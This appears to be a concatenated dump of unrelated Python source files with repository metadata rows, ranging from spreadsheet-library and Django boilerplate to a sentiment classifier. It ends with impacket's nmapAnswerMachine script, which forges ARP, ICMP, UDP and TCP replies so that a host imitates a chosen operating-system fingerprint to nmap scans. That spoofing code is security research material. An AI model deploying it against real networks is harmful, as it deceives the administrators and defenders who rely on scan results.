if isinstance(value, INTEGER_TYPES):
self._active_sheet_index = value
return
#if self._sheets and 0 <= value < len(self._sheets):
#value = self._sheets[value]
#else:
#raise ValueError("Sheet index is outside the range of possible values", value)
if value not in self._sheets:
raise ValueError("Worksheet is not in the workbook")
if value.sheet_state != "visible":
raise ValueError("Only visible sheets can be made active")
idx = self._sheets.index(value)
self._active_sheet_index = idx
def create_sheet(self, title=None, index=None):
"""Create a worksheet (at an optional index).
:param title: optional title of the sheet
:type title: unicode
:param index: optional position at which the sheet will be inserted
:type index: int
"""
if self.read_only:
raise ReadOnlyWorkbookException('Cannot create new sheet in a read-only workbook')
if self.write_only :
new_ws = WriteOnlyWorksheet(parent=self, title=title)
else:
new_ws = Worksheet(parent=self, title=title)
self._add_sheet(sheet=new_ws, index=index)
return new_ws
def _add_sheet(self, sheet, index=None):
"""Add an worksheet (at an optional index)."""
if not isinstance(sheet, (Worksheet, WriteOnlyWorksheet, Chartsheet)):
raise TypeError("Cannot be added to a workbook")
if sheet.parent != self:
raise ValueError("You cannot add worksheets from another workbook.")
if index is None:
self._sheets.append(sheet)
else:
self._sheets.insert(index, sheet)
def remove(self, worksheet):
"""Remove `worksheet` from this workbook."""
idx = self._sheets.index(worksheet)
localnames = self.defined_names.localnames(scope=idx)
for name in localnames:
self.defined_names.delete(name, scope=idx)
self._sheets.remove(worksheet)
@deprecated("Use wb.remove(worksheet) or del wb[sheetname]")
def remove_sheet(self, worksheet):
"""Remove `worksheet` from this workbook."""
self.remove(worksheet)
def create_chartsheet(self, title=None, index=None):
if self.read_only:
raise ReadOnlyWorkbookException("Cannot create new sheet in a read-only workbook")
cs = Chartsheet(parent=self, title=title)
self._add_sheet(cs, index)
return cs
@deprecated("Use wb[sheetname]")
def get_sheet_by_name(self, name):
"""Returns a worksheet by its name.
:param name: the name of the worksheet to look for
:type name: string
"""
return self[name]
def __contains__(self, key):
return key in set(self.sheetnames)
def index(self, worksheet):
"""Return the index of a worksheet."""
return self.worksheets.index(worksheet)
@deprecated("Use wb.index(worksheet)")
def get_index(self, worksheet):
"""Return the index of the worksheet."""
return self.index(worksheet)
def __getitem__(self, key):
"""Returns a worksheet by its name.
:param name: the name of the worksheet to look for
:type name: string
"""
for sheet in self.worksheets + self.chartsheets:
if sheet.title == key:
return sheet
raise KeyError("Worksheet {0} does not exist.".format(key))
def __delitem__(self, key):
sheet = self[key]
self.remove(sheet)
def __iter__(self):
return iter(self.worksheets)
@deprecated("Use wb.sheetnames")
def get_sheet_names(self):
return self.sheetnames
@property
def worksheets(self):
"""A list of sheets in this workbook
:type: list of :class:`openpyxl.worksheet.worksheet.Worksheet`
"""
return [s for s in self._sheets if isinstance(s, (Worksheet, ReadOnlyWorksheet, WriteOnlyWorksheet))]
@property
def chartsheets(self):
"""A list of Chartsheets in this workbook
:type: list of :class:`openpyxl.chartsheet.chartsheet.Chartsheet`
"""
return [s for s in self._sheets if isinstance(s, Chartsheet)]
@property
def sheetnames(self):
"""Returns the list of the names of worksheets in this workbook.
Names are returned in the worksheets order.
:type: list of strings
"""
return [s.title for s in self._sheets]
def create_named_range(self, name, worksheet=None, value=None, scope=None):
"""Create a new named_range on a worksheet"""
defn = DefinedName(name=name, localSheetId=scope)
if worksheet is not None:
defn.value = "{0}!{1}".format(quote_sheetname(worksheet.title), value)
else:
defn.value = value
self.defined_names.append(defn)
def add_named_style(self, style):
"""
Add a named style
"""
self._named_styles.append(style)
style.bind(self)
@property
def named_styles(self):
"""
List available named styles
"""
return self._named_styles.names
@deprecated("Use workbook.defined_names.definedName")
def get_named_ranges(self):
"""Return all named ranges"""
return self.defined_names.definedName
@deprecated("Use workbook.defined_names.append")
def add_named_range(self, named_range):
"""Add an existing named_range to the list of named_ranges."""
self.defined_names.append(named_range)
@deprecated("Use workbook.defined_names[name]")
def get_named_range(self, name):
"""Return the range specified by name."""
return self.defined_names[name]
@deprecated("Use del workbook.defined_names[name]")
def remove_named_range(self, named_range):
"""Remove a named_range from this workbook."""
del self.defined_names[named_range]
@property
def mime_type(self):
"""
The mime type is determined by whether a workbook is a template or
not and whether it contains macros or not. Excel requires the file
extension to match but openpyxl does not enforce this.
"""
ct = self.template and XLTX or XLSX
if self.vba_archive:
ct = self.template and XLTM or XLSM
return ct
def save(self, filename):
"""Save the current workbook under the given `filename`.
Use this function instead of using an `ExcelWriter`.
.. warning::
When creating your workbook using `write_only` set to True,
you will only be able to call this function once. Subsequents attempts to
modify or save the file will raise an :class:`openpyxl.shared.exc.WorkbookAlreadySaved` exception.
"""
if self.read_only:
raise TypeError("""Workbook is read-only""")
if self.write_only and not self.worksheets:
self.create_sheet()
save_workbook(self, filename)
@property
def style_names(self):
"""
List of named styles
"""
return [s.name for s in self._named_styles]
def copy_worksheet(self, from_worksheet):
"""Copy an existing worksheet in the current workbook
.. warning::
This function cannot copy worksheets between workbooks.
worksheets can only be copied within the workbook that they belong
:param from_worksheet: the worksheet to be copied from
:return: copy of the initial worksheet
"""
if self.__write_only or self._read_only:
raise ValueError("Cannot copy worksheets in read-only or write-only mode")
new_title = u"{0} Copy".format(from_worksheet.title)
to_worksheet = self.create_sheet(title=new_title)
cp = WorksheetCopy(source_worksheet=from_worksheet, target_worksheet=to_worksheet)
cp.copy_worksheet()
return to_worksheet
def close(self):
"""
Close workbook file if open. Only affects read-only and write-only modes.
"""
if hasattr(self, '_archive'):
self._archive.close()
| [
"slashsdull@gmail.com"
] | slashsdull@gmail.com |
6f9b54e564353b153d9722ad704799455a77f0b0 | 578e8f18c12e425f7a17210fb3c324ef1fac61c1 | /video_ex/streaming/video-client.py | e26013024013d5141e772ca25fa6e1696521f2eb | [] | no_license | jeonghaejun/09.RaspberryPi | 06c513add59d34e34a340f10cffa7a5aca075bd2 | 7a9145d985b5bfd227cc5bb90e5a2ac280292550 | refs/heads/master | 2023-03-24T23:15:57.693146 | 2021-03-19T08:56:08 | 2021-03-19T08:56:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from video import Video
from time import sleep
import socket
import json
import net
HOST = '127.0.0.1'
PORT = 5000
if __name__ == '__main__':
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
writer = s.makefile('wb')
reader = s.makefile('rb')
with Video(device=0) as v:
for image in v:
image = Video.to_jpg(image, 60)
print('video send ', len(image))
net.send(writer, image)
result = net.receive(reader)[0]
print(json.loads(result.decode()))
| [
"wjdgownsll@gmail.com"
] | wjdgownsll@gmail.com |
317e5b0993195cab701b749f5687da23f96ed43f | d79493f0f9b2664a597e6a2909516d2a582b3389 | /smote.py | a25ec68c13b417285fe0f30fba16fbb75143194d | [] | no_license | vivekaxl/Enigma | 8594c6efdd6ca7b5081bdd43772a17a426bb61bf | d4e9ae627c027181881b2b3369dd502c40254921 | refs/heads/master | 2020-05-18T06:16:31.093635 | 2015-02-05T16:24:20 | 2015-02-05T16:24:20 | 30,219,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,371 | py | # from os import environ, getcwd
# import sys
# from scipy.spatial.distance import euclidean
# # Update PYTHONPATH
# HOME = environ['HOME']
# axe = HOME + '/git/axe/axe/' # AXE
# pystat = HOME + '/git/pystats/' # PySTAT
# cwd = getcwd() # Current Directory
# sys.path.extend([axe, pystat, cwd])
# from random import choice, seed, uniform as rand
# import pandas as pd
# from dectree import *
# def SMOTE(data = None, k = 5, atleast = 50, atmost = 100):
# def Bugs(tbl):
# cells = [i.cells[-2] for i in tbl._rows]
# return cells
# def minority(data):
# unique = list(set(sorted(Bugs(data))))
# counts = len(unique) * [0];
# # set_trace()
# for n in xrange(len(unique)):
# for d in Bugs(data):
# if unique[n] == d: counts[n] += 1
# return unique, counts
# def knn(one, two):
# pdistVect = []
# # set_trace()
# for ind, n in enumerate(two):
# pdistVect.append([ind, euclidean(one.cells[:-1], n.cells[:-1])])
# indices = sorted(pdistVect, key = lambda F:F[1])
# return [two[n[0]] for n in indices]
# def extrapolate(one, two):
# new = one;
# # set_trace()
# new.cells[3:-1] = [min(a, b) + rand() * (abs(a - b)) for
# a, b in zip(one.cells[3:-1], two.cells[3:-1])]
# new.cells[-2] = int(new.cells[-2])
# return new
# def populate(data):
# newData = []
# reps = len(data) - atleast
# for _ in xrange(reps):
# for one in data:
# neigh = knn(one, data)[1:k + 1];
# two = choice(neigh)
# newData.append(extrapolate(one, two))
# data.extend(newData)
# return data
# def depopulate(data):
# return [choice(data) for _ in xrange(atmost)]
# newCells = []
# seed(1)
# unique, counts = minority(data)
# rows = data._rows
# for u, n in zip(unique, counts):
# if 1 < n < atleast:
# newCells.extend(populate([r for r in rows if r.cells[-2] == u]))
# elif n > atmost:
# newCells.extend(depopulate([r for r in rows if r.cells[-2] == u]))
# else:
# newCells.extend([r for r in rows if r.cells[-2] == u])
# return clone(data, rows = [k.cells for k in newCells])
# def test_smote():
# dir = '../Data/camel/camel-1.6.csv'
# Tbl = createTbl([dir])
# newTbl = SMOTE(data = Tbl)
# for r in newTbl._rows:
# print r.cells
# if __name__ == '__main__':
# test_smote() | [
"vivekaxl@gmail.com"
] | vivekaxl@gmail.com |
44db71a127fe964df4f92057b9d7472fb80b7ad3 | 48a555658d4a3b26f4b69211d047103ad82bb93c | /manage.py | 30208a5f2a8b773b2b799de2a074952435fc6267 | [] | no_license | blocknodes/roomreserver | 56d2d91dfaed3841218fa27e050440dd55f2afbb | bf926c3a8bc5c3283599ba088ad0cfd667855973 | refs/heads/main | 2023-06-14T13:04:18.663605 | 2021-07-05T09:02:32 | 2021-07-05T09:02:32 | 383,076,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'roomreserver.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"you@example.com"
] | you@example.com |
f824fb4fc38a34d6258a36c61bb44234d657c45d | 9a05e1e8c950b091124d805ea70f24d2837b827c | /daydayup/cema_python/eight/requestdemo4.py | 618e089e2210c839c52184cb85beb8e835dad219 | [] | no_license | fanzongpeng/mywork | 20676a9fe0e0599461a756ad194e4bd35aad4668 | aa6d044bbab3c0288de48888b2cc7dbd7785c91b | refs/heads/master | 2022-05-31T06:03:26.826914 | 2020-04-30T09:50:22 | 2020-04-30T09:50:22 | 257,189,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,011 | py | import json
dict = {
'message': 'success',
'url': '',
'data': {
'address': '北京',
'eid': 1,
'name': '这是一个测试',
'limit': 2000,
'start_time': '2019-05-31T15:25:19',
'status': True
},
'status': 200
}
# json = json.dumps(dict)
# print(json)
schema = {
"definitions": {},
"$schema": "http://json-schema.org/draft-07/schema#",
"$id": "http://example.com/root.json",
"type": "object",
"title": "The Root Schema",
"required": [
"message",
"url",
"data",
"status"
],
"properties": {
"message": {
"$id": "#/properties/message",
"type": "string",
"title": "The Message Schema",
"enum": ["success", "error"],
"pattern": "^(.*)$"
},
"url": {
"$id": "#/properties/url",
"type": "string",
"title": "The url",
"format": "uri",
},
"data": {
"$id": "#/properties/data",
"type": "object",
"title": "The Data Schema",
"required": [
"address",
"eid",
"name",
"limit",
"start_time",
"status"
],
"properties": {
"address": {
"$id": "#/properties/data/properties/address",
"type": "string",
"title": "The Address Schema",
"default": "",
"examples": [
"成都"
],
"pattern": "^(.*)$"
},
"eid": {
"$id": "#/properties/data/properties/eid",
"type": "integer",
"title": "The Eid Schema",
"default": 0,
"examples": [
1
]
},
"name": {
"$id": "#/properties/data/properties/name",
"type": "string",
"title": "The Name Schema",
"default": "",
"examples": [
"这是也是汉字"
],
"pattern": "^(.*)$"
},
"limit": {
"$id": "#/properties/data/properties/limit",
"type": "integer",
"title": "The Limit Schema",
"default": 0,
"examples": [
2000
]
},
"start_time": {
"$id": "#/properties/data/properties/start_time",
"type": "string",
"title": "The Start_time Schema",
"default": "",
"format": "date-time",
"examples": [
"2017-11-21T15:25:19"
],
"pattern": "^(.*)$"
},
"status": {
"$id": "#/properties/data/properties/status",
"type": "boolean",
"title": "The Status Schema",
"default": False,
"examples": [
True
]
}
}
},
"status": {
"$id": "#/properties/status",
"type": "integer",
"title": "The Status Schema",
"default": 0,
"examples": [
200
]
}
}
}
from jsonschema.validators import Draft4Validator
data = dict
validator = Draft4Validator(schema)
validator.validate(data) | [
"18210023228.com"
] | 18210023228.com |
87421e86c5d1275f774023eab4e876ea28c4e92e | 33c2c804fd38483755093628c6b08f31c296bd9f | /nlp/sentiment_analysis/MNB_classifier.py | ffa14200cd31e7f289886d0a47a469b9c55b25d7 | [] | no_license | thefr33radical/projects | 1ec51e5ec2d8b4ff671d7aa9a6bb72f6292f9b52 | ec26e509b64c58c79facadaf6345ab77f8ae7bd7 | refs/heads/master | 2021-06-02T19:21:12.369653 | 2021-04-23T12:46:52 | 2021-04-23T12:46:52 | 135,284,488 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,675 | py | from sklearn.externals.joblib import Memory
from sklearn.datasets import load_svmlight_file
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import metrics
import numpy as np
from sklearn.naive_bayes import MultinomialNB
import pandas as pd
import os
from sklearn.datasets import load_files
import glob
import sys
import re
import pickle
mem = Memory("/home/gowtham/drive/codes/racetrack/sentiment_analysis/aclImdb/mycache")
subset = load_files('/home/gowtham/drive/codes/racetrack/sentiment_analysis/aclImdb/train',shuffle='False',encoding='utf-8')
subset2=load_files('/home/gowtham/drive/codes/racetrack/sentiment_analysis/aclImdb/test',shuffle='False',encoding='utf-8')
for i in range(0,len(subset.data)):
f_name=subset.filenames[i]
temp=f_name.split("_")
temp2=temp[2].split(".")
subset.target[i]=int(temp2[0])
# print((subset.data[i]), subset.filenames[i],subset.target[i])
v=CountVectorizer()
X=v.fit_transform(subset.data)
#print(v.get_feature_names())
model=MultinomialNB()
model.fit(X,subset.target)
#print(v.vocabulary_)
for i in range(0,len(subset2.data)):
f_name=subset2.filenames[i]
temp=f_name.split("_")
temp2=temp[2].split(".")
subset2.target[i]=int(temp2[0])
# print((subset.data[i]), subset.filenames[i],subset.target[i])
filename=("model.sav")
pickle.dump(model,open(filename,"wb"))
#--------------------------Testing-------------------------------------------------------
X2=v.transform(subset2.data)
expected=subset2.target
predicted=model.predict(X2)
c=pd.DataFrame({'test_data':subset2.data,'actual_value':subset2.target,'predicted':predicted})
c.to_csv("output.csv")
l=['this is very good.',
'this is bad.',
'this is very bad.',
'this is not good.',
'this is not what i had expected.',
'you are taking too much time.',
'this is good',
'this is awesome',
'this is slighly good',
'i expected better than this',
'this is much more than my expectation',
'this is something i love',
'this is something i hate',
'you are taking a hell lot of time.']
X3=v.transform(l)
predicted2=model.predict(X3)
c2=pd.DataFrame({'test_data':l,'predicted':predicted2})
c2.to_csv("output2.csv")
report=(metrics.classification_report(expected, predicted))
con_matrix=(metrics.confusion_matrix(expected, predicted))
print(report,con_matrix)
#with open("report.txt","w+") as f:
# f.write(report)
# f.write(con_matrix)
| [
"imperial.gauntlet@gmail.com"
] | imperial.gauntlet@gmail.com |
d048808d665f0b2335b0686f1f4c78264ffa56f2 | 81407be1385564308db7193634a2bb050b4f822e | /the-python-standard-library-by-example/ConfigParser/ConfigParser_allow_no_value.py | df8d6ea50bcdf1b9e1f5e8c326f47e315b219efe | [
"MIT"
] | permissive | gottaegbert/penter | 6db4f7d82c143af1209b4259ba32145aba7d6bd3 | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | refs/heads/master | 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 | MIT | 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null | UTF-8 | Python | false | false | 771 | py | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2010 Doug Hellmann. All rights reserved.
#
"""Reading a configuration file.
"""
#end_pymotw_header
import ConfigParser
# Require values
try:
parser = ConfigParser.SafeConfigParser()
parser.read('allow_no_value.ini')
except ConfigParser.ParsingError, err:
print 'Could not parse:', err
# Allow stand-alone option names
print '\nTrying again with allow_no_value=True'
parser = ConfigParser.SafeConfigParser(allow_no_value=True)
parser.read('allow_no_value.ini')
for flag in [ 'turn_feature_on', 'turn_other_feature_on' ]:
print
print flag
exists = parser.has_option('flags', flag)
print ' has_option:', exists
if exists:
print ' get:', parser.get('flags', flag)
| [
"350840291@qq.com"
] | 350840291@qq.com |
e67cd7a58f5a860c679aa449643fff683cf93bf0 | 9b8ca63a377e6f94cc6a970cc97a6f7f50932811 | /sale_analysis_report/__openerp__.py | 1aff230cf327cf05e60e952bcf9687f43b84d1a5 | [
"Apache-2.0"
] | permissive | lester-lees/extra_addons_sz | 9b6d2400abe4707b7b18d9e2e9caf2fb366cf3a6 | cddaf972cf4ea64c553bcff0006eb006a115d5ee | refs/heads/master | 2021-01-06T20:43:28.782147 | 2017-08-07T06:51:45 | 2017-08-07T06:51:45 | 99,545,991 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | # -*- coding: utf-8 -*-
{
"name": "Sale Analysis Report",
"description": """
""",
"version": "0.1",
"depends": ["base", "sale", "report_webkit"],
"category": "Reporting",
"author": "Jimmy Lee",
"url": "http://www.loewie.com/",
"update_xml": ["sale_report_view.xml","loewie_purchase_report.xml"],
"installable": True,
"auto_install": False,
} | [
"346994202@qq.com"
] | 346994202@qq.com |
c04b4864c9cd61b5cc428fd8e54f48ad6750ccef | e8d4fe2361d71aef6519f666152f14137156159c | /impacket-0.9.11/examples/nmapAnswerMachine.py | eaf2067e4a5a288294264361fc4f09eca167fb4c | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"Apache-1.1",
"BSD-2-Clause"
] | permissive | kenzshi/DDoSProject | 11d7e676a150964a9f78f1b7e1df4468dd9d973f | 9587a2be7f4773d19a96a35d1128f5041f0472da | refs/heads/master | 2021-01-10T19:48:21.355849 | 2015-03-16T09:52:22 | 2015-03-16T09:52:22 | 30,205,639 | 42 | 32 | null | null | null | null | UTF-8 | Python | false | false | 36,339 | py | import random
import os_ident
import uncrc32
try: import pcap as pcapy
except: import pcapy
from impacket import ImpactPacket
from impacket import ImpactDecoder
from impacket.ImpactPacket import TCPOption
#defaults
MAC = "01:02:03:04:05:06"
IP = "192.168.67.254"
IFACE = "eth0"
OPEN_TCP_PORTS = [80, 443]
OPEN_UDP_PORTS = [111]
UDP_CMD_PORT = 12345
nmapOSDB = '/usr/share/nmap/nmap-os-db'
# Fingerprint = 'Adtran NetVanta 3200 router' # CD=Z TOSI=Z <----------- NMAP detects it as Linux!!!
# Fingerprint = 'ADIC Scalar 1000 tape library remote management unit' # DFI=S
# Fingerprint = 'Siemens Gigaset SX541 or USRobotics USR9111 wireless DSL modem' # DFI=O U1(DF=N IPL=38)
# Fingerprint = 'Apple Mac OS X 10.5.6 (Leopard) (Darwin 9.6.0)' # DFI=Y SI=S U1(DF=Y)
Fingerprint = 'Sun Solaris 10 (SPARC)'
# Fingerprint = 'Sun Solaris 9 (x86)'
# Fingerprint = '3Com OfficeConnect 3CRWER100-75 wireless broadband router' # TI=Z DFI=N !SS TI=Z II=I
# Fingerprint = 'WatchGuard Firebox X5w firewall/WAP' # TI=RD
# no TI=Hex
# Fingerprint = 'FreeBSD 6.0-STABLE - 6.2-RELEASE' # TI=RI
# Fingerprint = 'Microsoft Windows 98 SE' # TI=BI ----> BROKEN! nmap shows no SEQ() output
# Fingerprint = 'Microsoft Windows NT 4.0 SP5 - SP6' # TI=BI TOSI=S SS=S
# Fingerprint = 'Microsoft Windows Vista Business' # TI=I U1(IPL=164)
# Fingerprint = 'FreeBSD 6.1-RELEASE' # no TI (TI=O)
# Fingerprint = '2Wire 1701HG wireless ADSL modem' # IE(R=N)
# Fingerprint = 'Cisco Catalyst 1912 switch' # TOSI=O SS=S
O_ETH = 0
O_IP = 1
O_ARP = 1
O_UDP = 2
O_TCP = 2
O_ICMP = 2
O_UDP_DATA = 3
O_ICMP_DATA = 3
def string2tuple(string):
if string.find(':') >= 0:
return [int(x) for x in string.split(':')]
else:
return [int(x) for x in string.split('.')]
class Responder:
templateClass = None
signatureName = None
def __init__(self, machine):
self.machine = machine
print "Initializing %s" % self.__class__.__name__
self.initTemplate()
self.initFingerprint()
def initTemplate(self):
if not self.templateClass:
self.template_onion = None
else:
try:
probe = self.templateClass(0, ['0.0.0.0',self.getIP()],[0, 0])
except:
probe = self.templateClass(0, ['0.0.0.0',self.getIP()])
self.template_onion = [probe.get_packet()]
try:
while 1: self.template_onion.append(self.template_onion[-1].child())
except: pass
# print "Template: %s" % self.template_onion[O_ETH]
# print "Options: %r" % self.template_onion[O_TCP].get_padded_options()
# print "Flags: 0x%04x" % self.template_onion[O_TCP].get_th_flags()
def initFingerprint(self):
if not self.signatureName:
self.fingerprint = None
else:
self.fingerprint = self.machine.fingerprint.get_tests()[self.signatureName].copy()
def isMine(self, in_onion):
return False
def buildAnswer(self, in_onion):
return None
def sendAnswer(self, out_onion):
self.machine.sendPacket(out_onion)
def process(self, in_onion):
if not self.isMine(in_onion): return False
print "Got packet for %s" % self.__class__.__name__
out_onion = self.buildAnswer(in_onion)
if out_onion: self.sendAnswer(out_onion)
return True
def getIP(self):
return self.machine.ipAddress
# Generic Responders (does the word Responder exist?)
class ARPResponder(Responder):
def isMine(self, in_onion):
if len(in_onion) < 2: return False
if in_onion[O_ARP].ethertype != ImpactPacket.ARP.ethertype:
return False
return (
in_onion[O_ARP].get_ar_op() == 1 and # ARP REQUEST
in_onion[O_ARP].get_ar_tpa() == string2tuple(self.machine.ipAddress))
def buildAnswer(self, in_onion):
eth = ImpactPacket.Ethernet()
arp = ImpactPacket.ARP()
eth.contains(arp)
arp.set_ar_hrd(1) # Hardward type Ethernet
arp.set_ar_pro(0x800) # IP
arp.set_ar_op(2) # REPLY
arp.set_ar_hln(6)
arp.set_ar_pln(4)
arp.set_ar_sha(string2tuple(self.machine.macAddress))
arp.set_ar_spa(string2tuple(self.machine.ipAddress))
arp.set_ar_tha(in_onion[O_ARP].get_ar_sha())
arp.set_ar_tpa(in_onion[O_ARP].get_ar_spa())
eth.set_ether_shost(arp.get_ar_sha())
eth.set_ether_dhost(arp.get_ar_tha())
return [eth, arp]
class IPResponder(Responder):
def buildAnswer(self, in_onion):
eth = ImpactPacket.Ethernet()
ip = ImpactPacket.IP()
eth.contains(ip)
eth.set_ether_shost(in_onion[O_ETH].get_ether_dhost())
eth.set_ether_dhost(in_onion[O_ETH].get_ether_shost())
ip.set_ip_src(in_onion[O_IP].get_ip_dst())
ip.set_ip_dst(in_onion[O_IP].get_ip_src())
ip.set_ip_id(self.machine.getIPID())
return [eth, ip]
def sameIPFlags(self, in_onion):
if not self.template_onion: return True
return (self.template_onion[O_IP].get_ip_off() & 0xe000) == (in_onion[O_IP].get_ip_off() & 0xe000)
def isMine(self, in_onion):
if len(in_onion) < 2: return False
return (
(in_onion[O_IP].ethertype == ImpactPacket.IP.ethertype) and
(in_onion[O_IP].get_ip_dst() == self.machine.ipAddress) and
self.sameIPFlags(in_onion)
)
def setTTLFromFingerprint(self, out_onion):
f = self.fingerprint
# Test T: Initial TTL = range_low-range_hi, base 16
# Assumption: we are using the minimum in the TTL range
try:
ttl = f['T'].split('-')
ttl = int(ttl[0], 16)
except:
ttl = 0x7f
# Test TG: Initial TTL Guess. It's just a number, we prefer this
try: ttl = int(f['TG'], 16)
except: pass
out_onion[O_IP].set_ip_ttl(ttl)
class ICMPResponder(IPResponder):
def buildAnswer(self, in_onion):
out_onion = IPResponder.buildAnswer(self, in_onion)
icmp = ImpactPacket.ICMP()
out_onion[O_IP].contains(icmp)
out_onion.append(icmp)
icmp.set_icmp_id(in_onion[O_ICMP].get_icmp_id())
icmp.set_icmp_seq(in_onion[O_ICMP].get_icmp_seq())
out_onion[O_IP].set_ip_id(self.machine.getIPID_ICMP())
return out_onion
def isMine(self, in_onion):
if not IPResponder.isMine(self, in_onion): return False
if len(in_onion) < 3: return False
return (
(in_onion[O_ICMP].protocol == ImpactPacket.ICMP.protocol) and
self.sameICMPTemplate(in_onion))
def sameICMPTemplate(self, in_onion):
t_ip = self.template_onion[O_IP]
t_icmp = self.template_onion[O_ICMP]
t_icmp_datalen = self.template_onion[O_ICMP_DATA].get_size()
return (
(t_ip.get_ip_tos() == in_onion[O_IP].get_ip_tos()) and
(t_ip.get_ip_df() == in_onion[O_IP].get_ip_df()) and
(t_icmp.get_icmp_type() == in_onion[O_ICMP].get_icmp_type()) and
(t_icmp.get_icmp_code() == in_onion[O_ICMP].get_icmp_code()) and
(t_icmp_datalen == in_onion[O_ICMP_DATA].get_size())
)
class UDPResponder(IPResponder):
def isMine(self, in_onion):
return (
IPResponder.isMine(self, in_onion) and
(len(in_onion) >= 3) and
(in_onion[O_UDP].protocol == ImpactPacket.UDP.protocol)
)
class OpenUDPResponder(UDPResponder):
def isMine(self, in_onion):
return (
UDPResponder.isMine(self, in_onion) and
self.machine.isUDPPortOpen(in_onion[O_UDP].get_uh_dport()))
def buildAnswer(self, in_onion):
out_onion = IPResponder.buildAnswer(self, in_onion)
udp = ImpactPacket.UDP()
out_onion[O_IP].contains(udp)
out_onion.append(udp)
udp.set_uh_dport(in_onion[O_UDP].get_uh_sport())
udp.set_uh_sport(in_onion[O_UDP].get_uh_dport())
return out_onion
class ClosedUDPResponder(UDPResponder):
def isMine(self, in_onion):
return (
UDPResponder.isMine(self, in_onion) and
not self.machine.isUDPPortOpen(in_onion[O_UDP].get_uh_dport()))
def buildAnswer(self, in_onion):
out_onion = IPResponder.buildAnswer(self, in_onion)
icmp = ImpactPacket.ICMP()
out_onion[O_IP].contains(icmp)
out_onion.append(icmp)
icmp.contains(in_onion[O_IP])
out_onion += in_onion[O_IP:]
icmp.set_icmp_type(icmp.ICMP_UNREACH)
icmp.set_icmp_code(icmp.ICMP_UNREACH_PORT)
return out_onion
class TCPResponder(IPResponder):
def buildAnswer(self, in_onion):
out_onion = IPResponder.buildAnswer(self, in_onion)
tcp = ImpactPacket.TCP()
out_onion[O_IP].contains(tcp)
out_onion.append(tcp)
tcp.set_th_dport(in_onion[O_TCP].get_th_sport())
tcp.set_th_sport(in_onion[O_TCP].get_th_dport())
return out_onion
def sameTCPFlags(self, in_onion):
if not self.template_onion: return True
in_flags = in_onion[O_TCP].get_th_flags() & 0xfff
t_flags = self.template_onion[O_TCP].get_th_flags() & 0xfff
return in_flags == t_flags
def sameTCPOptions(self, in_onion):
if not self.template_onion: return True
in_options = in_onion[O_TCP].get_padded_options()
t_options = self.template_onion[O_TCP].get_padded_options()
return in_options == t_options
def isMine(self, in_onion):
if not IPResponder.isMine(self, in_onion): return False
if len(in_onion) < 3: return False
return (
in_onion[O_TCP].protocol == ImpactPacket.TCP.protocol and
self.sameTCPFlags(in_onion) and
self.sameTCPOptions(in_onion)
)
class OpenTCPResponder(TCPResponder):
def isMine(self, in_onion):
return (
TCPResponder.isMine(self, in_onion) and
in_onion[O_TCP].get_SYN() and
self.machine.isTCPPortOpen(in_onion[O_TCP].get_th_dport()))
def buildAnswer(self, in_onion):
out_onion = TCPResponder.buildAnswer(self, in_onion)
out_onion[O_TCP].set_SYN()
out_onion[O_TCP].set_ACK()
out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq()+1)
out_onion[O_TCP].set_th_seq(self.machine.getTCPSequence())
return out_onion
class ClosedTCPResponder(TCPResponder):
def isMine(self, in_onion):
return (
TCPResponder.isMine(self, in_onion) and
in_onion[O_TCP].get_SYN() and
not self.machine.isTCPPortOpen(in_onion[O_TCP].get_th_dport()))
def buildAnswer(self, in_onion):
out_onion = TCPResponder.buildAnswer(self, in_onion)
out_onion[O_TCP].set_RST()
out_onion[O_TCP].set_ACK()
out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq()+1)
out_onion[O_TCP].set_th_seq(self.machine.getTCPSequence())
return out_onion
class UDPCommandResponder(OpenUDPResponder):
# default UDP_CMD_PORT is 12345
# use with:
# echo cmd:exit | nc -u $(IP) $(UDP_CMD_PORT)
# echo cmd:who | nc -u $(IP) $(UDP_CMD_PORT)
def set_port(self, port):
self.port = port
self.machine.openUDPPort(port)
return self
def isMine(self, in_onion):
return (
OpenUDPResponder.isMine(self, in_onion))# and
#in_onion[O_UDP].get_uh_dport() == self.port)
def buildAnswer(self, in_onion):
cmd = in_onion[O_UDP_DATA].get_bytes().tostring()
if cmd[:4] == 'cmd:': cmd = cmd[4:].strip()
print "Got command: %r" % cmd
if cmd == 'exit':
from sys import exit
exit()
out_onion = OpenUDPResponder.buildAnswer(self, in_onion)
out_onion.append(ImpactPacket.Data())
out_onion[O_UDP].contains(out_onion[O_UDP_DATA])
if cmd == 'who':
out_onion[O_UDP_DATA].set_data(self.machine.fingerprint.get_id())
return out_onion
# NMAP2 specific responders
class NMAP2UDPResponder(ClosedUDPResponder):
signatureName = 'U1'
# No real need to filter
# def isMine(self, in_onion):
# return (
# ClosedUDPResponder.isMine(self, inOnion) and
# (in_onion[O_UDP_DATA].get_size() == 300))
def buildAnswer(self, in_onion):
out_onion = ClosedUDPResponder.buildAnswer(self, in_onion)
f = self.fingerprint
# assume R = Y
try:
if (f['R'] == 'N'): return None
except: pass
# Test DF: Don't fragment IP bit set = [YN]
if (f['DF'] == 'Y'): out_onion[O_IP].set_ip_df(True)
else: out_onion[O_IP].set_ip_df(False)
